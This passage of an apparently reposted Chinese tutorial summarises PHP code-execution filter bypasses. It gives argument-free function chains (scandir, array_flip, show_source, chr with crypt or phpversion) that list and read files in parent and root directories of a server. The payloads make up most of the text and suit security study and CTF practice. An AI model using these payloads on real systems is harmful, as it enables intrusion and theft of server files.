var_dump(getenv(phpinfo()));
scandir()
這種方法是使用比較多的,相對而言比較多變,各個函式相輔相成,
scandir() //函式回傳指定目錄中的檔案和目錄的陣列, localeconv() //回傳一包含本地數字及貨幣格式資訊的陣列, current() //回傳陣列中的單元,默認取第一個值, pos是current的別名 getcwd() //取得當前作業目錄 dirname() //函式回傳路徑中的目錄部分, array_flip() //交換陣列中的鍵和值,成功時回傳交換后的陣列 array_rand() //從陣列中隨機取出一個或多個單元 //array_flip()和array_rand()配合使用可隨機回傳當前目錄下的檔案名 //dirname(chdir(dirname()))配合切換檔案路徑 //current(localeconv())表示.
示例:
print_r(scandir(dirname(getcwd()))); //查看上一級目錄的檔案 print_r(scandir(next(scandir(getcwd())))); //查看上一級目錄的檔案 show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd()))))))); //讀取上級目錄檔案 show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));//讀取上級目錄檔案 show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));//讀取上級目錄檔案 show_source(array_rand(array_flip(scandir(chr(current(localtime(time(chdir(next(scandir(current(localeconv()))))))))))));//這個得爆破,不然手動要重繪很久,如果檔案是正數或倒數第一個第二個最好不過了,直接定位 print_r(scandir(chr(ord(strrev(crypt(serialize(array()))))))); //查看和讀取根目錄檔案 if(chdir(chr(ord(strrev(crypt(serialize(array())))))))print_r(scandir(getcwd())); //查看和讀取根目錄檔案
phpversion()獲取 .
-
phpversion()回傳php版本,如7.3.5 -
floor(phpversion())回傳7 -
sqrt(floor(phpversion()))回傳2.6457513110646 -
tan(floor(sqrt(floor(phpversion()))))回傳-2.1850398632615 -
cosh(tan(floor(sqrt(floor(phpversion())))))回傳4.5017381103491 -
sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))回傳45.081318677156 -
ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))回傳46 -
chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))回傳. -
var_dump(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))))掃描當前目錄 -
next(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))))回傳..
floor() :舍去法取整, sqrt() :平方根, tan() :正切值, cosh() :雙曲余弦, sinh() :雙曲正弦, ceil() :進一法取整
chr(ord(hebrevc(crypt(phpversion())))) 回傳 .
-
hebrevc(crypt(arg))可以隨機生成一個hash值 第一個字符隨機是 $(大概率) 或者 .(小概率) 然后通過ord chr只取第一個字符-
crypt():單向字串散列,回傳散列后的字串或一個少于 13 字符的字串,從而保證在失敗時與鹽值區分開來, -
hebrevc():將邏輯順序希伯來文(logical-Hebrew)轉換為視覺順序希伯來文(visual-Hebrew),并且轉換換行符,回傳視覺順序字串,
-
總結:
繞過是門學問,要對PHP語言有足夠的理解,對各種函式熟練的應用,當然很多的師傅都走在了前面,我們要做的就是把這些整理、歸納好,好好學習研究,爭取能自己想到一下新的姿勢,
參考自:
遠程命令/代碼執行漏洞(RCE)總結_WHOAMIAnony的博客-CSDN博客
無字母數字webshell之提高篇 | 離別歌
一些不包含數字和字母的webshell | 離別歌
代碼審計之create_function()函式 - 卿先生 - 博客園
https://xz.aliyun.com/t/10212
https://xz.aliyun.com/t/9360#toc-6
老生常談的無字母數字 Webshell 總結 - FreeBuf網路安全行業門戶
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/336163.html
標籤:其他